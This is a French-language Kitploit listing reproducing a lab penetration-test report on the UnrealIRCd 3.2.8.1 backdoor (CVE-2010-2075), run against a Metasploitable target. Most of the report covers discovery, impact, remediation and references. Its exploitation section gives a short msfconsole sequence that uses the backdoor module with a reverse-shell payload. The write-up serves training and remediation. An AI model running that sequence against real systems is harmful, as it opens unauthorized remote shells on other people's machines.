Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
unrealircd-backdoor-pentest-report — Rapport de laboratoire de test d'intrusion contrôlé pour la backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075) sur Metasploitable3 avec étapes de remédiation. | Kitploit
Outils/GitHubGitHub/elazab2005/unrealircd-backdoor-pentest-report
ReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
elazab2005/unrealircd-backdoor-pentest-report

unrealircd-backdoor-pentest-report

Rapport de laboratoire de test d'intrusion contrôlé pour la backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075) sur Metasploitable3 avec étapes de remédiation.

Voir le dépôt
il y a 4 joursPas encore vérifié
Partager

🛡️ Test d'intrusion de la backdoor UnrealIRCd

Un projet de test d'intrusion contrôlé visant à identifier, exploiter et corriger la backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075) dans un environnement d'entraînement isolé.

Avertissement : Ce projet a été mené strictement à des fins éducatives et de test de sécurité autorisé contre un environnement de laboratoire volontairement vulnérable. Aucun système non autorisé n'a été ciblé.


📌 Vue d'ensemble du projet

Ce projet démontre un flux de travail complet d'évaluation de vulnérabilités et d'exploitation contre un service UnrealIRCd 3.2.8.1 vulnérable.

L'évaluation couvre :

  • Découverte et énumération de services
  • Identification d'un service UnrealIRCd vulnérable
  • Validation du service IRC exposé
  • Exploitation contrôlée à l'aide de Metasploit
  • Collecte de preuves
  • Remédiation et durcissement de la sécurité
  • Documentation technique du test d'intrusion

Cible

ÉlémentDétails
CibleEnvironnement de laboratoire Metasploitable
IP cible10.10.10.13
Service vulnérableUnrealIRCd
Version3.2.8.1
ProtocoleIRC
Port6667/TCP
VulnérabilitéBackdoor UnrealIRCd
CVECVE-2010-2075
SévéritéCritique

Selon la National Vulnerability Database du NIST, les distributions UnrealIRCd 3.2.8.1 concernées contenaient une modification introduite de l'extérieur qui pouvait permettre à des attaquants distants d'exécuter des commandes arbitraires.


🎯 Objectifs

Les principaux objectifs de cette évaluation étaient :

  1. Identifier les services exposés sur la cible.
  2. Déterminer si le service UnrealIRCd était vulnérable.
  3. Valider la vulnérabilité par une exploitation contrôlée.
  4. Évaluer l'impact potentiel d'une exploitation réussie.
  5. Documenter les preuves techniques.
  6. Appliquer les mesures de remédiation appropriées.
  7. Vérifier que le service vulnérable a été sécurisé ou désactivé.

🧰 Outils utilisés

OutilObjectif
NmapScan de ports et énumération de services
NetcatTest de connectivité des services TCP
Metasploit FrameworkExploitation contrôlée
Linux CLIVérification et durcissement du système
UFWConfiguration du pare-feu
PythonTâches de sécurité/test de support

🔎 Méthodologie

L'évaluation a suivi un flux de travail de test d'intrusion simplifié :

root@kitploit:~
Reconnaissance
      ↓
Service Enumeration
      ↓
Vulnerability Identification
      ↓
Exploitation
      ↓
Evidence Collection
      ↓
Impact Assessment
      ↓
Remediation
      ↓
Verification

1. 🔍 Découverte de services

La première étape consistait à identifier les services exposés sur l'hôte cible.

L'évaluation a identifié un service IRC à l'écoute sur :

root@kitploit:~
TCP/6667

Le service a été associé à UnrealIRCd 3.2.8.1, une version connue pour être affectée par la vulnérabilité de la backdoor.

Preuves

Scan des ports

Figure 1 — Énumération des ports et des services

La découverte du TCP/6667 a fourni l'indication initiale qu'un service IRC était exposé et nécessitait une enquête plus approfondie.


2. 🚨 Identification de la vulnérabilité

La version UnrealIRCd identifiée a été associée à CVE-2010-2075.

La vulnérabilité n'est pas simplement un bug logiciel conventionnel. L'archive concernée contenait une modification/backdoor malveillante qui permettait l'exécution de commandes à distance. La NVD décrit le problème comme un cheval de Troie introduit de l'extérieur dans la macro DEBUG3_DOLOG_SYSTEM.

La documentation Metasploit de Rapid7 identifie le module correspondant comme suit :

root@kitploit:~
exploit/unix/irc/unreal_ircd_3281_backdoor

et le décrit comme exploitant la backdoor malveillante présente dans les archives UnrealIRCd 3.2.8.1 concernées.


3. 💥 Exploitation contrôlée

La vulnérabilité a été validée dans l'environnement de laboratoire isolé à l'aide du Metasploit Framework.

Exemple de flux de travail d'exploitation :

root@kitploit:~
msfconsole

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 10.10.10.13

set PAYLOAD cmd/unix/reverse

run

Le but de cette étape était de vérifier si le service exposé pouvait être abusé pour obtenir une exécution de commandes à distance.

Rapid7 documente ce module Metasploit spécifiquement pour la backdoor UnrealIRCd 3.2.8.1.

Preuves

Preuve d'exploitation

Figure 2 — Preuve de l'exploitation contrôlée

La preuve démontre l'étape d'exploitation réalisée contre la cible de laboratoire autorisée.


4. ⚠️ Impact sur la sécurité

L'exploitation réussie de la backdoor peut offrir à un attaquant la capacité d'exécuter des commandes à distance dans le contexte de sécurité du processus UnrealIRCd concerné.

Les privilèges exacts obtenus dépendent du compte sous lequel le démon IRC s'exécute.

L'impact potentiel comprend :

  • Exécution de commandes non autorisée
  • Compromission initiale du système
  • Accès aux fichiers disponibles pour le compte compromis
  • Énumération locale supplémentaire
  • Élévation de privilèges potentielle
  • Persistance potentielle
  • Mouvement latéral potentiel si des faiblesses supplémentaires existent

Important : L'impact potentiel ne doit pas être interprété comme une preuve que chaque action listée a été réalisée au cours de cette évaluation.

La documentation de Nmap pour la backdoor UnrealIRCd confirme que la vulnérabilité peut être utilisée pour exécuter des commandes arbitraires sur le système distant.


5. 🛠️ Remédiation

L'installation UnrealIRCd vulnérable ne doit pas rester exposée dans un environnement de production.

Les actions de remédiation recommandées comprennent :

Actions immédiates

  1. Supprimer le paquet UnrealIRCd compromis/backdooré.
  2. Le remplacer par une version fiable et vérifiée provenant d'une source légitime.
  3. Désactiver le service IRC s'il n'est pas requis.
  4. Restreindre l'accès aux services IRC à l'aide de règles de pare-feu ou d'ACL réseau.
  5. Examiner le système à la recherche d'indicateurs de compromission.
  6. Examiner les journaux d'authentification et système.
  7. Renouveler les identifiants potentiellement exposés si une compromission est suspectée.

Durcissement réseau

Si IRC n'est pas requis :

root@kitploit:~
sudo ufw deny 6667/tcp

Si le service est requis, l'accès doit être restreint aux réseaux de confiance plutôt que d'être largement exposé.

Durcissement du service

L'approche privilégiée consiste à supprimer le logiciel vulnérable et à déployer une version prise en charge et fiable, plutôt que de tenter de s'appuyer uniquement sur le filtrage réseau.


6. ✅ Preuves de remédiation

L'étape de remédiation a été documentée après l'application des contrôles de sécurité appropriés.

Preuve de remédiation

Figure 3 — Preuve de remédiation / durcissement

La preuve de remédiation doit démontrer l'état du service et/ou de la configuration du pare-feu après l'application des actions correctives.


📊 Évaluation des risques

CatégorieÉvaluation
VulnérabilitéBackdoor UnrealIRCd 3.2.8.1
CVECVE-2010-2075
Vecteur d'attaqueRéseau
Authentification requiseAucune authentification requise pour déclencher la backdoor
Interaction utilisateurNon requise
ImpactExécution de commandes à distance
SévéritéCritique

La backdoor a été conçue pour permettre l'exécution de commandes à distance et pouvait fonctionner indépendamment des restrictions normales des utilisateurs IRC, faisant de l'exposition du service vulnérable un risque de sécurité significatif.


📁 Structure du projet

root@kitploit:~
unrealircd-backdoor-pentest-report/
│
├── README.md
├── UnrealIRCD_Backdoor_PenTest_Report.pdf
│
└── images/
    ├── port_scan.png
    ├── exploit_evidence.png
    └── remediation.png

📸 Résumé des preuves

PreuveDescription
port_scan.pngDécouverte du service IRC exposé
exploit_evidence.pngPreuve de l'exploitation contrôlée
remediation.pngPreuve de sécurité/durcissement post-remédiation

🧠 Principaux enseignements

Cette évaluation démontre plusieurs concepts importants de test d'intrusion :

  • L'énumération de services est essentielle pour identifier la surface d'attaque.
  • L'identification de la version du logiciel peut révéler des vulnérabilités connues.
  • Un service hérité exposé sur le réseau peut fournir une voie d'accès initiale directe.
  • L'exploitation doit toujours être réalisée dans un cadre autorisé.
  • Les preuves techniques sont essentielles pour étayer les conclusions du test d'intrusion.
  • La remédiation doit traiter le problème de sécurité sous-jacent plutôt que de simplement masquer le service exposé.
  • Les rapports de sécurité doivent clairement distinguer les résultats observés de l'impact potentiel.

📚 Références

  • NIST National Vulnerability Database — CVE-2010-2075
    Détails du CVE et description de la vulnérabilité.

  • Rapid7 Vulnerability Database — Exécution de commandes via la backdoor UnrealIRCd 3.2.8.1
    Documentation du module Metasploit et détails techniques.

  • Rapid7 Metasploit Framework — Module backdoor UnrealIRCd
    Implémentation officielle du module Metasploit.

  • Documentation Nmap NSE — irc-unrealircd-backdoor
    Documentation pour la détection de la backdoor UnrealIRCd.


⚖️ Avertissement

Ce dépôt est destiné uniquement à l'éducation en cybersécurité, aux tests d'intrusion autorisés et à la recherche en sécurité dans des environnements contrôlés.

Les techniques démontrées dans ce projet ne doivent être utilisées que contre des systèmes pour lesquels une autorisation explicite a été obtenue.

N'utilisez pas ces techniques contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.

Télécharger l’outil